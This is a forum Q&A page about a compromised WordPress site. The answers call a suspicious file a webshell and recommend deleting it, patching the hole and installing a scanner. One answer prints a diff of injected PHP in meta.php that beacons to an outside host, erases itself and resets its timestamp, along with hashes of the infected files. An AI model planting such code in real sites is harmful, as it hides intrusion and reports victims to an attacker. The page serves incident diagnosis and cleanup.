WordPress Site hacked? Suspicious PHP file

Solution:

Delete the file instantly!

ThisPHP code is a modified webshell. Those could be used to atack other websites and could lead to serious legal problems!

After deletion you should also fix the leak that let the file in!

Solution:

Yes, the PHP script allows to run code on the Server.

Source: http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

Through diff'ing with a clean WP tarball, I found meta.php was modified:

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }
Copy code

FYI, here are the md5sums of infected files:

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php
Copy code

Solution:

You should install something like the Wordfence plug in on your website, which will check all of the plug in and theme folders continuously against the official release versions. It will also help prevent dangerous file uploads like this.